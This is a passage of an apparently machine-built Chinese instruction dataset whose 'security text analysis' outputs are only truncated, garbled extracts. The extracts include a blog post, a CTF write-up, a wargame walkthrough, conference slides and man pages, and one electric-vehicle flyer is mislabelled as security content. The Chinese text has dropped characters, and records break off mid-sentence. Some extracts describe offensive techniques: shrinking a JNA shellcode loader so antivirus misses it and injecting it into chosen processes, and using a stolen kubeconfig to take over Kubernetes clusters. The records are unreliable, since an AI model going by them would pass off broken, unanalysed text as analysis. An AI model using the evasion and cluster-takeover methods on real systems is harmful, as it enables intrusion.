起始它将被解释为十六进制数据否则如果它以 0 起始则看作八进制否则看作十进制所指定类型可以为 .TP b 创建一个块缓冲特殊文件 .TP c, u 创建一个字符无缓冲特殊文件 .TP p 创建一个 FIFO .PP 注意您的 shell 可能提供了它自己版本的 mknod且它通常都会覆盖这里所描述的版本请参考您所用 shell 的文档以了解它们所支持选项的细节 .SH 作者 由 David MacKenzie 编写 .SH 报告错误 2020年三月 .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBmknod\\fP(2) .PP .br 完整文档请见<https://www.gnu.org/software/coreutils/mknod> .br 或者在本地使用 info \\(aq(coreutils) mknod invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ngoby识别指纹的功能很不错想试试能不能把goby指纹识别里面的指纹提取出来移植到自己的扫描器 中,结果后面到了逆向虚拟机的程度 goby的crules 在goby 最初的版本中翻看了一些感兴趣的资源文件后看到有个 crules 文件 它的文件头是yara文件 并且里面包含了它的指纹 通过文本提取可以把规则提取出来但是每个规则之间的逻辑关系并不清楚 新版的crules提取 现在goby使用了最新的go版本 1.16 在go1.16嵌入资源有个官方实现叫 go embed 可以根据在二进制中搜索 embed.FS 来确认是否使 用了这个特性 然后我自己测试了一下看看 go embed 内嵌资源是如何实现的结果发现资源直接在二进制中明文显 示 于是搜索 YARA 关键字就能再次定位到goby的指纹规则部分 yara结构分析 硬看看不懂规则之间逻辑的关系所以只能看yara代码是怎么做的 看到goby使用了这个库 https://github.com/hillu/go-yara 应该就是用来解析规则的看这个库 的实现它只是c版本yara源码的封装所以还是要去看yara的代码 官方仓库是 https://github.com/VirusTotal/yara 我下载了2.0 3.0 和4.x最新版的源码发现里面的文件版本和这个都对不上一度怀疑是魔改的yara 最后我在 yara-3.10.0 找到了符合goby规则的代码 yara编译后文件的规则真是多变,并且每个版本的规则还不兼容 yara加载编译后的文件 在 yr_arena_load_stream 可以看到magic为yara的标记以及版本的判断相关代码 crules文件开头对应的数据结构如下 之后读取指定长度的字节后剩余的字节都是用于重定向地址用 typedef struct _ARENA_FILE_HEADER { char magic[4]; uint32_t size; uint32_t version; } ARENA_FILE_HEADER; 之后在 yr_rules_load_stream 先通过一个结构映射头 然后再解析出每个节的地址 typedef struct _YARA_RULES_FILE_HEADER { DECLARE_REFERENCE(YR_RULE*, rules_list_head); DECLARE_REFERENCE(YR_EXTERNAL_VARIABLE*, externals_list_head); DECLARE_REFERENCE(const uint8_t*, code_start); DECLARE_REFERENCE(YR_AC_MATCH_TABLE, match_table); DECLARE_REFERENCE(YR_AC_TRANSITION_TABLE, transition_table); } YARA_RULES_FILE_HEADER; 得到每个表的位置yara编译后的文件加载过程到此完成 yara结构总结 通过不断的调试大概知道yara是怎么处理编译后的yara文件的了 yara的编译机制就是把内存中的yara数据结构保存为一个文件然后对一些重定向内容做一些处理 加载过程也是同理之后程序运行位置交到 new_rules->code_start 这个地址上它将会运行yara的 虚拟机程序虚拟机对所有规则做出判断 yara逆向 整个虚拟机执行在 exec.c 文件的 yr_execute_code 函数上在上面打上断点 new_rules->code_start = header->code_start; new_rules->externals_list_head = header->externals_list_head; new_rules->rules_list_head = header->rules_list_head; new_rules->match_table = header->match_table; new_rules->transition_table = header->transition_table; 此时的调用堆栈 单步运行下来发现这是一个栈式虚拟机从地址获取opcode根据opcode执行 OP_HALT 是中断标志这个opcode出现代表执行完毕 exec.h 定义了各种opcode和int的关系 经过调试发现每次规则开始的时候都会调用 OP_INIT_RULE  然后这个执行地址后面的地址就是RULE的数据结构记录了meta等信息 typedef struct _YR_INIT_RULE_ARGS { DECLARE_REFERENCE(YR_RULE*, rule); DE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# REbase Binary RE, 400 points ## Description: > You receive an ELF binary which you must unlock with a key. Find the key and it will contain your flag. ## Solution: Let's start by inspecting the binary: ```console root@kali:/media/sf_CTFs/mitre/rebase# file REbase-fix REbase-fix: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped root@kali:/media/sf_CTFs/mitre/rebase# ./REbase-fix Usage: ./REbase flag root@kali:/media/sf_CTFs/mitre/rebase# ./REbase-fix test 4 rUC/C/== ZXFWtmKgDZCyrmC5B+CiVfsyXUCQVfsyZRFzDU4yX2YCD/F5Ih8= Try Again :( root@kali:/media/sf_CTFs/mitre/rebase# ./REbase-fix my_flag 7 wBsyMdbibi== ZXFWtmKgDZCyrmC5B+CiVfsyXUCQVfsyZRFzDU4yX2YCD/F5Ih8= Try Again :( ``` It looks like the program is outputting base64-encoded messages, let's try to decode them: ```console root@kali:/media/sf_CTFs/mitre/rebase# echo rUC/C/== | base64 -d && echo @ root@kali:/media/sf_CTFs/mitre/rebase# echo wBsyMdbibi== | base64 -d && echo 1n root@kali:/media/sf_CTFs/mitre/rebase# echo ZXFWtmKgDZCyrmC5B+CiVfsyXUCQVfsyZRFzDU4yX2YCD/F5Ih8= | base64 -d && echo N2_fy\" s ``` This does not appear to be meaningful. However the resemblance to Base64 behavior is very high: ```console root@kali:/media/sf_CTFs/mitre/rebase# ./REbase-fix a 1 QQ== ZXFWtmKgDZCyrmC5B+CiVfsyXUCQVfsyZRFzDU4yX2YCD/F5Ih8= Try Again :( root@kali:/media/sf_CTFs/mitre/rebase# ./REbase-fix aa 2 QWi= ZXFWtmKgDZCyrmC5B+CiVfsyXUCQVfsyZRFzDU4yX2YCD/F5Ih8= Try Again :( root@kali:/media/sf_CTFs/mitre/rebase# ./REbase-fix aaa 3 NVYi ZXFWtmKgDZCyrmC5B+CiVfsyXUCQVfsyZRFzDU4yX2YCD/F5Ih8= Try Again :( (root@kali:/media/sf_CTFs/mitre/rebase# echo -n 'a' | base64 YQ== root@kali:/media/sf_CTFs/mitre/rebase# echo -n 'aa' | base64 YWE= root@kali:/media/sf_CTFs/mitre/rebase# echo -n 'aaa' | base64 YWFh) ``` It looks like the padding character is identical to Base64 (\"`=`\"), and that each encoded character represents 6 bits of data. Therefore, three 8-bit bytes are represented by four 6-bit encoded char", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 3 Reference: https://docs.microsoft.com/en-us/windows/win32/secauthz/how-dacls- control-access-to-an-object 4 5 6 7 8 9 Reference: https://github.com/samratashok/nishang/blob/master/Backdoors/Set- RemotePSRemoting.ps1 10 11 Reference - https://github.com/samratashok/nishang/blob/master/Backdoors/Set- RemoteWMI.ps1 12 13 14 15 16 https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptor- string-format 17 18 19 20 21 Reference: https://docs.microsoft.com/en-us/powershell/jea/overview 22 23 24 25 26 27 28 29 References: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc- compromise-in-one-line-a0f779b8dc83 http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for- escalation-in-active-directory.html 30 https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best- practices/appendix-c--protected-accounts-and-groups-in-active-directory 31 32 Reference: http://techgenix.com/aquicktiptoallowdsrmaccounttologonnormally/ 33 34 Reference: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#generic- dacl-abuse 35 36 37 38 39 40 Reference: https://docs.microsoft.com/en-us/windows/win32/adschema/r-user- force-change-password 41 References: https://docs.microsoft.com/en-us/windows-server/identity/ad- ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in- active-directory https://adsecurity.org/?p=1906 42 43 References: https://www.dcshadow.com/ https://www.labofapenetrationtester.com/2018/04/dcshadow.html https://www.labofapenetrationtester.com/2018/05/dcshadow-sacl.html 44 45 46 47 48 [1] - http://active-undelete.com/dcom-configuration.htm [2] - https://redmondmag.com/articles/2002/02/01/securing-remote-management- with-wmi.aspx 49 https://github.com/BloodHoundAD/BloodHound/tree/master https://github.com/canix1/ADACLScanner https://www.pingcastle.com/ https://github.com/samratashok/Deploy-Deception 50 51 52", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Humor  Your Adversaries 2 This is how your adversaries envision their DDoS attacks on your webserver: Humor  Your Webserver 3 This is how your webserver will respond after implementing some of the defensive strategies that this talk will cover: Background  Personal  Blake currently works as a principal security architect. He was directly involved with defending against Operation Ababil and has worked to defend SX against various DDoS attacks.  Cisc0ninja works in threat intelligence and has been a long time member of SX.  We both did infosec in the USMC  Disclaimer  Opinions/ideas/solutions are from us and not representative or from our employers.  Some humor images have explicit language in them. 4 What This Speech Will Cover  Requirements (for our examples)  Introduction  Attack Landscape  Attacks from Operation Ababil and SX  Network Defense and Monitoring  Tools and techniques to provide defense and monitoring on the network  Web Defense and Detection  Tools and techniques to provide defense and detection on the webserver  Reacting to an Attack  How to handle DDoS when your organization is under fire  Best Practices  Putting it all together  Story Time  Stories of attacks against SX and the aftermath 5 Requirements  What do you need for our examples?  Linux/Unix  Apache2  Python and Perl  Raspberry Pi  16x2 LCD for RoboAmp (-l lcd option)  Snort  Inline if possible  Network sniffer  Hardware if possible  Critical thinking skills  Were trying to teach you how to adapt your defenses as the attackers improve their offensive capabilities 6  Why this talk is relevant  Layer 7 (Application) DDoS attacks have been on the rise since at least 2010. Operation Ababil was low in technical complexity, but had a major impact on the financial sector.  DDoS one of the preferred methods by hacktivists as a form of protest.  What about CloudFlare/Prolexic/etc  Cost  Security through obscurity (only as secure as your IP address) for non BGP based solutions  Web sites often leak ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Attacker Looks At Docker Approaching Multi-Container Applications Wesley McGrew, Ph.D. Director of Cyber Operations HORNE Cyber wesley.mcgrew@hornecyber.com @mcgrewsecurity My Background  Ph.D. Computer Science  Mississippi State University  Academia  NSA CAE  Research, Education, Cyber Operations  MSU  Industrial Control Systems  Human-Machine Interfaces  Research & Education - Reverse Engineering & Malware Attribution  Private  Director of Cyber Operations  HORNE Cyber  Computer Network Operations  CNO/CNE/CAN  Penetration testing, red teaming, application security  Operational security of testing engagements Intentions  to make a strong point about the relationship between an attackers skill set (and its development over time) vs. developer trends.  How to leverage what you already know  How to look at learning new technologies moving forward  to provide a hacker experienced in exploitation and post-exploitation of networks of systems an exposure to applications composed of multiple containers  Exploring application internals  with concrete Docker examples that leverage common practices (those in tutorials and intuitive/naïve usage)  Inspiration concept/approach  HD Moore/Valsmith DEF CON 15 Tactical Exploitation  Target audience  Attackers  Pentest, Red Team, CNE, CNO Prior Art in Docker  David Mortman, Docker, Docker, Give Me the News, I Got a Bad Case of Securing you, DEF CON 23  Underlying implementation and architecture  Aaron Grattafiori, Understanding and Hardening Linux Containers, DEF CON 23  Kernel capabilities and advice for low-level security  Docker documentation  Current state: a lack of default on  Anthony Bettini, Vulnerability Exploitation in Docker Containers, Black Hat Europe 2015  Platform vulnerabilities  Michael Cherney and Sagie Dulce, Well, That Escalated Quickly! How Abusing Docker API Led to Remote Code Execution, Same Origin Bypass and Persistence in The Hypervisor via Shadow Containers, Black Hat USA 2017  Targeting developers Conta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Weaponizing Unicode: Homographs Beyond IDNs 2 Who Am I The Tarquin (aka Aaron M Brown) Senior Security Engineer Amazon.com 3 Disclaimers 4 5 WTF, Why? The human race will begin solving its problems on the day that it ceases taking itself so seriously. - Malaclypse the Younger 6 Scope, Context, and Prior Art http://www.xn--exmple-qxe.com/ 7 8 The Dark Corners of Unicode ꓮvs vs ᴀ vs 9 Quiz Time Α Uppercase Greek Alpha u+0391 10 Quiz Time ı Latin Small Letter Dotless I (u+0131) + Combining Dot Above (u+0307) 11 Quiz Time Mathematical MonoSpace Capital Z u+1D689 12 Quiz Time  Rupee Sign, u+20A8 13 Not to be Confused With  Indian Rupee Sign, u+20B9 14 Quiz Time ᚁ Ogham letter Beith u+1681 15 Lets Hack Shit 16 Search and Indexing 17 Do you want to play a game 18 Defeating Plagiarism Detection 19 Defeating Plagiarism Detection 20 Lol text analysis 21 Lol text analysis 22 Lol spellcheck 23 Lesson 1: Unicode support usually just means passed my unit tests. 24 Defeating ML Systems Explanations exist; they have existed for all time; there is always a well- known solution to every human problem [which is] neat, plausible, and wrong. - H. L. Mencken 25 Default Data Set 26 Homographs, in MY Training Set? 27 100% Homographs in Neg Training 28 10% Homographs in Neg Training 29 Sabotaging a Cinematic Masterwork 30 Sabotaging a Cinematic Masterwork 31 Sabotaging a Cinematic Masterwork 32 Lesson 2: ML overindexes on human-invisible patterns. If a human could see them, we wouldnt be using ML. 33 34 But emojis arent the real problem 35 Demo 36 Mitigation: Code Quality 37 Lesson 3: Homographs work because people take dont actually see text; they see whatever it represents. 38 Canary Traps, And Repudiation Canary Traps: because you want to know whos singing 39 Canary Traps, And Repudiation 40 Homographs, Canary Traps, And Repudiation 41 Homograph Bombs Go ód ñ evvs, h cke    42 And now, for the worlds most boring demo... 43 Tool Intro: samesame Because small, sharp tools are the best. 4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Jna加载ShellCode优化 起因 修改 最后 @yzddmr6 蚁剑最开始实现java加载shellcode是通过jna的式这个做法是来源于个apt组织的法 https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/ 但是不是很便的点是这个shellcode loader体积于2m超过了tomcat默认上传最度所以之 前直的做法都是先把编译好的jar上传到标服务器然后URLClassLoader去加载件虽然开 始jar乎是全免杀的但是落地还是增加了被识别的险 后来发现新版哥斯拉4也增加了jna来加载pe件研究了下发现他的jna加载器常只有不 到1m 研究了下发现beichen师傅的做法很秀简单来说就是低版本jna+删除把梭 先是选取了个低版本的jna概是4.1.0版本这个版本的jna只有1.4m左右我开始的较新 的jna版本是5.5.0体积概位2.5m左右但是经过测试旧版本对于加载shellcode是没有影响的 起因 2 除此之外beichen师傅还删掉了些不到的其他平台的扩展 可以看到原版jna还有对很多linux平台下的持 3 但是shellcode加载器般只在win下使所以在哥斯拉中都统统删掉了 4 除此之外还有些elf件解析的类还有加载shellcode时候不到的类也都通通删掉 还有些可能是不到的类也删掉了 5 修改的话可以直接把jar当作压缩件打开不需要解压然后删除不需要的录或者最简单的可以 直接引哥斯拉的loader 按照beichen师傅的做法修改后我们loader的体积已经于1m了 这个时候就可以通过内存加载jar需件落地了 除此之外还顺修改了些loader的逻辑原来插件中遇到32位的java会注但是为了险考 虑新版本已经全部修改成了注其他进程防抖就把站给搞坏了 新版插件增加了随机注进程还有动选择注标进程的选项 另外现在持打64位的shellcode了 修改 6 注指定进程时填写进程的绝对路径 7 getpid查看当前进程pid位4356 ps下发现就是我们启动的arp.exe 有了这个迷你版jna之后我们就可以件实现所有其他shellcode加载器能够实现的操作在插件的 默认版本只是会粗暴的CreateProcess然后往写shellcode但其实在jna中只要继承 最后 8 StdCallLibrary这个接就可以调kernel32中的函数这仅仅是抛砖引师傅们可以各种姿 势定制化属于的加载器", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nConvert to Electric Vehicles 2009 Electric Auto Association (EAA) Promoting the use of electric vehicles since 1967 Electro Automotive VoltsRabbit Acterra EV Conversion Project DC Motor Example components Why Build an EV? Today there are limited production electric vehicles available, so converting an existing internal combustion engine (ICE) vehicle to an electric vehicle (EV) might be the best current choice available to obtain an EV. Building your own EV can be a rewarding and challenging experience. Not only will you be a pioneer in the EV movement, but you will also be recycling a car that may be headed for the junk yard. Dont wait for Detroit. Custom build an EV yourself1. A typical EV conversion will achieve a range of 30-60 miles for each charge. Studies have shown that 80% of commuters travel less than 40 miles per day, and 50% of commuters travel 20 miles or less per day. An EV conversion can meet those daily driving needs. EVs are a clean, efficient alternative to conventional vehicles  using technology that is readily available today! EVs produce zero emissions, and when you consider the full fuel cycle to generate electricity, are up to 99% cleaner than gasoline and diesel vehicles. EV owners enjoy the financial benefits of significantly lower fuel and maintenance expenses. Finally, EVs help reduce our dependence on oil. What steps are involved? This overview provides a high level framework for performing a conversion. Please review the references and other links (in the next section) for more complete information. 1. Determine your driving needs: range  the distance you travel in a single day; type of vehicle  family car, commuter, utility vehicle, or racing car. 2. Look for an EV kit for the vehicle you choose. Kits will make the conversion significantly easier  they include all of the parts, except batteries. A conversion kit will cost about $4,000-$6,000, and the batteries, depending on how many you need, can cost another $700-$1,200. 3. Make sure y", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe WorldWide WarDrive: The Myths, The Misconceptions, The Truth, The Future Chris Hurley aka Roamer History I was talking with The Watcher on the Netstumbler Forums and found out we live relatively close to each other. We thought it would be fun to try to coordinate a WarDrive to cover the entire city of Baltimore and started a thread on the Netstumbler Forums to see if there was any interest. Renderman decided to do a coordinated drive in his area. Blackwave and Mentat had discussed a similar idea in the past. History I posted the idea on the DefCon Forums to see if there was any more interest. There was. That coordinated drive of Baltimore quickly evolved into the WorldWide WarDrive. History Continued The Myths Myths are the false impressions about the WorldWide WarDrive and WarDriving in general that have been thrust upon the general public by the media and the uninformed (not mutually exclusive). The myth that the WorldWide WarDrive is a covert organization run by shady individuals out to provide terrorists with information has been propagated by several different media organizations. Myth 1 The group that runs the www.worldwidewardrive.org Web site leaves its own identity secret but does offer numerous links to other like-minded organizations as well as giving a somewhat cryptic e-mail address, roamer@worldwidewardrive.org, for those interested in organizing their own local efforts. Wardrive appears to be an offshoot of warchalking, another tactic intended to disclose unsecured wireless networks. Source: Wardrive attempts to find unsecured wireless networks by Ephraim Schwartz http://www.infoworld.com/article/02/10/24/021024hnwardrive8_1.html Evidence of Myth 1 Myth 1 exposed Using a handle or online identity is an act of hiding your identity This is just not true. The for profit issue is even addressed in the WWWD FAQ: \"Can I hire you to secure my access point for me? No\" There appears to be no description of the WWWD members A link from a for profit security", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMultipot: A More Potent Variant of Evil Twin K. N. Gopinath Senior Wireless Security Researcher and Senior Engineering Manager AirTight Networks http://www.airtightnetworks.net Email: gopinath.kn@airtightnetworks.net What is this presentation about? It is about discovery of a more potent variant of Evil Twin. We call it Multipot. Evil Twin recapitulation Fundamentals of Multipot Technical details about Multipot threat Why traditional defenses against Evil Twin threat are ineffective against Multipot. Threat scenarios that arise due to Multipot A demonstration of Multipot threat Evil Twin - Recap Attacker sets up AP with a spoofed SSID Client lured into connecting to attackers AP Attacker becomes man-in-the-middle Threat is rampant in hotspots, also present in homes and campuses Known Countermeasures Established Attack Tools: KARMA, delegated, hotspotter, Monkey Jack and more Evil Twin SSID = XYZ WiFi Client Legitimate AP SSID = XYZ Attacker Laptop Network WIPS Sensor Session Containment X Level 1 Defense: Dont let client to be lured E.g., watchful user, layer 2 mutual authentication, preprogrammed list of legitimate AP MACs etc. Known Countermeasures Level 2 Defense Use Wireless Intrusion Prevention System (WIPS) to contain wireless session to Evil Twin. Session containment via spoofed deauth from sensor is prevalent Not foolproof and not always practical Level 2 Defense Use Wireless Intrusion Prevention System (WIPS) to break wireless connection to Evil Twin. MultiPot Multiple APs Acting as Evil Twin Multiple APs with identical SSID feeding data into common endpoint If traditional WIPS session containment is used on one AP, client hops to another AP in the Multipot and continues its communication Deauth based session containment becomes ineffective WiFi Client Attacker Laptop Network Multipot SSID=XYZ Multipot can be combined with: KARMA, delegated, hotspotter, Monkey Jack and more WIPS Sensor Session Containment Level 1 Defense: Dont let client to be lured E.g., w", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Bandit-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- https://overthewire.org/wargames/bandit/ ## Level 0 访问 ssh 连接 主机bandit.labs.overthewire.org 端口2220 bandit0/bandit0 不知道为啥 xshell 直接连不上去,用 linux ssh 连接上去了 ```bash ssh -p 2220 bandit0@bandit.labs.overthewire.org ``` --- ## Level 0  Level 1 连接上后,查看readme ```bash bandit0@bandit:~$ cat readme boJ9jbbUNNfktd78OOpsqOltutMc3MY1 ``` --- ## Level 1  Level 2 通过上一关读出的密码连接 2220 端口的 bandit1 用户 ``` ssh -p 2220 bandit1@bandit.labs.overthewire.org ``` 查看当前目录 ```bash bandit1@bandit:~$ ls -la total 24 -rw-r----- 1 bandit2 bandit1 33 May 7 2020 - drwxr-xr-x 2 root root 4096 May 7 2020 . drwxr-xr-x 41 root root 4096 May 7 2020 .. -rw-r--r-- 1 root root 220 May 15 2017 .bash_logout -rw-r--r-- 1 root root 3526 May 15 2017 .bashrc -rw-r--r-- 1 root root 675 May 15 2017 .profile ``` 查看 这个 `-` 文件,直接看不行,要加个路径 ```bash bandit1@bandit:~$ cat ./- CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9 ``` --- ## Level 2  Level 3 通过上一关读出的密码连接 2220 端口的 bandit2 用户 ``` ssh -p 2220 bandit2@bandit.labs.overthewire.org ``` 查看当前目录 ```bash bandit2@bandit:~$ ls -la total 24 drwxr-xr-x 2 root root 4096 May 7 2020 . drwxr-xr-x 41 root root 4096 May 7 2020 .. -rw-r--r-- 1 root root 220 May 15 2017 .bash_logout -rw-r--r-- 1 root root 3526 May 15 2017 .bashrc -rw-r--r-- 1 root root 675 May 15 2017 .profile -rw-r----- 1 bandit3 bandit2 33 May 7 2020 spaces in this filename ``` 这个文件名带空格,其实也好解决引号括起来就行了 ```bash bandit2@bandit:~$ cat 'spaces in this filename' UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK ``` --- ## Level 3  Level 4 通过上一关读出的密码连接 2220 端口的 bandit3 用户 ```bash ssh -p 2220 bandit3@bandit.labs.overthewire.org ``` 查看当前目录 ```bash bandit3@bandit:~$ ls -la total 24 drwxr-xr-x 3 root root 4096 May 7 2020 . drwxr-xr-x 41 root root 4096 May 7 2020 .. -rw-r--r-- 1 root root 220 May 15 2017 .bash_logout -rw-r--r-- 1 root root 3526 May 15 2017 .bashrc drwxr-xr-x 2 root root 4096 May 7 2020 inhere -rw-r--r-- 1 root root 675 May 15 2017 .profile # 发现一个目录,进入查看 bandit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFasten your seatbelts: We are escaping iOS 11 sandbox! Min(Spark) Zheng & Xiaolong Bai @ Alibaba Security Lab Whoami Alibaba Security  SparkZheng @ Twitter蒸米spark @ Weibo  Alibaba Security Expert  CUHK PhD, Blue-lotus and Insight-labs  iOS 9.3.4 & iOS 11.3.1 OverSky Jailbreak (Private) Alibaba Security  Xiaolong Bai (bxl1989 @ Twitter&Weibo)  Alibaba Security Engineer  Ph.D. graduated from Tsinghua University  Published papers on S&P, Usenix Security, CCS, NDSS iOS System Overview Alibaba Security  Application - in sandbox - few attack surfaces to kernel - only basic system info - memory info(e.g., sharedcache)  Userland - all system info - more attack surfaces to kernel  Kernel - Control the device System System Libs Kernel Frameworks IPC System Services Sandbox Alibaba Security  Apples Sandbox was introduced as SeatBelt in MacOS 10.5 which provides the first full fledged implementation of a MACF policy.  From its inception, the policy hooked dozens of operations. The number of hooks has been growing steadily when new system calls or newly discovered threats appeared (tables from *OS internals): Version XNU System Version Hook Count 34 1510 macOS 10.6 92 120 1699 macOS 10.7 98 211/220 2107 iOS 6/macOS 10.8 105 300 2422 iOS 7/macOS 10.9 109 358 2782 iOS 8/macOS 10.10 113 459 3216 iOS 9/macOS 10.11 119 592 3789 iOS 10/macOS 10.12 126/124 763 4570 iOS 11/macOS 10.13 132/131 Sandbox Profiles Alibaba Security  In MacOS, profiles are visible and stored in /System/Library/Sandbox/Profiles. In iOS, the profiles were hard-compiled into /usr/libexec/sandboxd. Its hard to decode the sandbox profiles, but we can traverse all mach services to get the mach-lookup list according to the return value (e.g., through sbtool by Jonathan Levin). Mach Service Name -> Binary Alibaba Security  In order to find vulnerabilities, we need to disassemble and analyze the binaries which contain the handler functions of related mach services. /System/Library/LaunchDaemons contains the configurati", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n隐藏信息接管k8s集群 最近在恶补些体系框架想到之前遇到的个攻防场景做个分享科普向 很多都分享过未授权场景的利但是关于证书认证token认证下攻防的场景不是很 多 基础概念补全 K8S k8s全称kubernetes是个开源的于管理云平台中多个主机上的容器化应的编排 管理具提供了应部署规划更新维护的种机制可简单理解为容器集权设备 kubernetes 涉及到个核组件其中apiserver提供了资源操作的唯操作基本 上都是通过 apiserver 这个组件进的它提供 HTTP RESTful 形式的 API 供集群内外客户端 调kubernetes 对于访问 API 来说提供了三个步骤的安全措施认证授权准控制 当户使 kubectlclient-go 或者 REST API 请求 apiserver 时都要经过以上三个步骤的 校验后涉及到Master节点NodeWorker节点最作单元Pod及Service后续 再科普 Kubectl 1 命令具管理 Kubernetes 集群 K8S API 认证 kubernetes 前所有的认证策略Authentication如下所示 X509 client certs Static Token File Bootstrap Tokens Static Password File Service Account Tokens OpenId Connect Tokens Webhook Token Authentication Authticating Proxy Anonymous requests User impersonation Client-go credential plugins kubernetes 前持如下四种鉴权Authorization机制 Node ABAC RBAC Webhook Linux 信息收集Tips 为什么忽然提及到Linux信息收集呢如果作环境为Mac或者unix系系统可能较了 解如 ls 和 ls -al 的区别 $HOME 路径下 .xxx 这些些服务应所代表的配置举 个例 .aggressor.prop 记录了你Cobalt Strike的所有配置包括连接地址户名密 码插件加载等 .bash_history和.ssh 不多赘述 .kube 本次重点 .zshrc 使zsh终端的配置件可做权限维持 本次场景 层络中拿到台服务器权限查看.bash_history发现存在Kubectl运维记录但是未 发现相关userpassword参数翻件发现.kube件夹 查看clusters.cluster.server发现三套集群分别为aliyun上提供对外业务集群第三层 络产环境集群测试集群配置件具体含义后续补充 提供个简单的本地连接式内代理在本地mkdir .kube然后copy conf到本 地.kube/config 然后后续和k8s匿名访问利法样 1. 获取Master节点信息 2. 获取 nodes 节点详细信息 3. 获取k8s 所有pods节点信息 4. 通过获取到的pods节点信息进对应docker 命令执 集群不算很最后获取近万台容器权限已 不多赘述了都快变成科普了 想起句话\"机制去对抗机制以运维思维去打攻防\" 1. Kubectl 简介及命令  从今天起做个运维吧同事那么厉害被卷死了还可以转个", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1983, 1990, 1991 The Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All advertising materials mentioning features or use of this software .\\\" must display the following acknowledgement: .\\\" This product includes software developed by the University of .\\\" California, Berkeley and its contributors. .\\\" 4. Neither the name of the University nor the names of its contributors .\\\" may be used to endorse or promote products derived from this software .\\\" without specific prior written permission. .\\\" .\\\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\\\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\\\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\\\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\\\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\\\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\\\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\\\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\\\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\\\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\\\" SUCH DAMAGE. .\\\" .\\\" Modified Sat Jul 24 16:42:42 1993 by Rik Faith <faith@cs.unc.edu> .\\\" Modified Mon Oct 21 23:05:29 EDT 1996 by Eric S. Raymond <esr@thyrsus.com> .\\\" Mod", "category": "text_analysis", "source": "security_papers"}
